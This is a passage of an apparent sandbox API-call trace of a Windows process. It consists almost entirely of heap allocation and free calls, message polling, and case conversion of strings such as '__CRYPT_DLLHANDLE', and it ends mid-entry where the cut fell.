[0043.921] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da238 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0043.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.922] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.922] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0043.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.923] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.924] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.924] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0043.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0043.927] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0043.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0043.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.929] HeapFree (in: 